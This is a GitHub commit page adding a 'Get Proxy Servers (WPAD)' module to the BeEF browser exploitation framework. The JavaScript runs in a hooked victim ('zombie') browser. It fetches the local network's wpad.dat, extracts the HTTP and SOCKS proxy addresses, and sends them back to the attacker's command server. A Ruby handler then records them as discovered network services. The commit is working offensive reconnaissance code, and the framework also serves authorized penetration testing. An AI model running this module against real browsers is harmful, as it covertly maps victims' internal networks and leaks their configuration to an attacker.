Permalink
Browse files

Add Get Proxy Servers (WPAD) module

  • Loading branch information...
1 parent 4c62d4a commit 6d2cf5efe2719d125bee219d82681eac4db61ab8 @bcoles bcoles committed Oct 11, 2015
@@ -0,0 +1,48 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ load_script = function(url) {
+ beef.debug("[Get Proxy Servers] Loading: " + url);
+ var s = document.createElement("script");
+ s.type = 'text/javascript';
+ s.src = url;
+ document.body.appendChild(s);
+ }
+
+ read_wpad = function() {
+ if (typeof FindProxyForURL === 'function') {
+ var wpad = FindProxyForURL.toString();
+ beef.debug("[Get Proxy Servers] Success: Found wpad (" + wpad.length + ' bytes)');
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=true&wpad="+wpad);
+ } else {
+ beef.debug("[Get Proxy Servers] Error: Did not find wpad");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=false");
+ return;
+ }
+ var proxies = [];
+ var proxyRe = /PROXY\s+[a-zA-Z0-9\.\-_]+:[0-9]{1,5}/g;
+ while (match = proxyRe.exec(wpad)) {
+ proxies.push(match[0]);
+ }
+ var proxyRe = /SOCKS\s+[a-zA-Z0-9\.\-_]+:[0-9]{1,5}/g;
+ while (match = proxyRe.exec(wpad)) {
+ proxies.push(match[0]);
+ }
+ if (proxies.length == 0) {
+ beef.debug("[Get Proxy Servers] Found no proxies");
+ return;
+ }
+ beef.debug("[Get Proxy Servers] Found "+proxies.length+" proxies: " + proxies.join(','));
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "proxies=" + proxies.join(','));
+ }
+
+ load_script("http://wpad/wpad.dat");
+ setTimeout("read_wpad()", 10000);
+
+});
+
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ get_proxy_servers_wpad:
+ enable: true
+ category: "Network"
+ name: "Get Proxy Servers (WPAD)"
+ description: "This module retrieves proxy server addresses for the zombie browser's local network using Web Proxy Auto-Discovery Protocol (WPAD).<br/><br/>Note: The zombie browser must resolve <i>wpad</i> to an IP address successfully for this module to work."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
@@ -0,0 +1,33 @@
+#
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_proxy_servers_wpad < BeEF::Core::Command
+
+ def post_execute
+ save({'result' => @datastore['result']})
+
+ configuration = BeEF::Core::Configuration.instance
+ return unless configuration.get("beef.extension.network.enable") == true
+ session_id = @datastore['beefhook']
+ if @datastore['results'] =~ /^proxies=(.+)$/
+ proxies = $1.to_s
+ proxies.split(',').uniq.each do |proxy|
+ if proxy =~ /^(SOCKS|PROXY)\s+([\d\.]+:[\d]{1,5})/
+ proxy_type = "#{$1}"
+ ip = $2.to_s.split(':')[0]
+ port = $2.to_s.split(':')[1]
+ proto = 'HTTP' if proxy_type =~ /PROXY/
+ proto = 'SOCKS' if proxy_type =~ /SOCKS/
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found #{proto} proxy [ip: #{ip}, port: #{port}]")
+ BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto.downcase, :ip => ip, :port => port, :type => "#{proto} Proxy")
+ end
+ end
+ end
+ end
+ end
+
+end
+

0 comments on commit 6d2cf5e

Please sign in to comment.